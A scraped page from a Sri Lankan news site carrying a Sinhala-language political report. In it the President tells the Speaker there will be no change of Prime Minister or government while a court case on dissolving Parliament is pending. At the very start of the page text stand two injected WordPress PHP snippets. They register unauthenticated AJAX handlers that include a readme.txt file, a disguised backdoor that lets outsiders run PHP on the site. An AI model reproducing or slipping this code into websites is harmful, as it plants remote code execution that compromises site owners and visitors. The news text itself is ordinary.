if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අගමැති හෝ ආණ්ඩු වෙනසක් නෑ..ජනපති කතානායකට යලිත් අවධාරණය කරයි.. - mediahumanrights.lk
mediahumanrights.lk
News Political

අගමැති හෝ ආණ්ඩු වෙනසක් නෑ..ජනපති කතානායකට යලිත් අවධාරණය කරයි..

පාර්ලිමේන්තුව විසුරුවා හැරීම සම්බන්ධයෙන් අධිකරණයේ නඩුවක් ක්‍රියාත්මක වන මොහොතක නව අගමැතිවරයකු ආණ්ඩුවක් පත් කිරීමට හැකියාවක් නැති බව ජනාධිපතිවරයා විසින් කතානායකවරයා වෙත දන්වා ඇත.

කතානායකවරයා සහ ජනාධිපතිවරයා අතර අද පස්වරුවේ පැවති සාකච්ඡාවේදී මේ බව දැන්වූ බව ජනාධිපති කාර්යාලයේ සමීප ආරංචි මාර්ග කියා සිටී.

ජනාධිපතිවරයා පෙන්වා දී ඇත්තේ පවතින තත්ත්වය අධිකරණයෙන් විසඳුමක් දෙනතෙක් ලබන දෙසැම්බර් 10 වන දින දක්වා පාර්ලිමේන්තුව කල් දමන ලෙසයි.

ඉන් පසුව අධිකරණ නියෝගයෙන් පසු තත්වයන් ගැන සලකා බැලිය හැකි බවද ජනාධිපතිවරයා පෙන්වා දී ඇත.

එමෙන්ම මේ මොහොතේ නව අගමැතිවරයෙක් පත් කිරීම සඳහා අගමැති ධුරය පුරප්පාඩු වී නැති බවද ජනාධිපතිවරයා පෙන්වා දී ඇත.

19 සංශෝධනයෙන් වූ පසු තමනට අගමැතිවරයා ඉවත් කිරීමට නොහැකි බවත් රනිල් වික්‍රමසිංහගේ අගමැති ධුරය අහෝසි වූයේ ජාතික ආණ්ඩුවෙන් සන්ධානයට ඉවත්වීමත් සමග කැබිනට් මණ්ඩලය අහෝසි වීම නිසා බවද ජනාධිපතිවරයා සදහන් කර තිබේ.

පාර්ලිමේන්තුවේ ස්ථාවර නියෝග අනුව විධිමත් ලෙස අගමැතිවරයා ඉවත් කිරීමට විශ්වාස භංගයක් සම්මත කල හැකි බවත් ජනාධිපතිවරයා යලි අවධාරණය කර ඇතැයිද වාර්තා වෙයි.

කෙසේ වෙතත් හෙට දිනයේ එක්සත් ජාතික පක්ෂය සහ දෙමළ ජාතික සන්ධාන නියෝජිතයන් සමඟ ද ජනාධිපතිවරයා සාකච්ඡාවක් පැවැත්වීමට නියමිත බවද සඳහන්ය.
(under the courtesy of lankacnews.com news web)

Related posts

පි. බී. අබේකොන් ජනාධිපති ලේකම් ධූරයෙන් ඉල්ලා අස් වෙයි

Shiran Viraj

ලොව පුරා පැතිර යන පරිගණක වෛරසයෙන් ආරක්ෂා වන්න උපදෙස්

Shiran Viraj

කාන්තාවන්ට අසුබ කාලයක්.. පඩියක් නැතිව ජොබ් කරන්න වෙයි

Shiran Viraj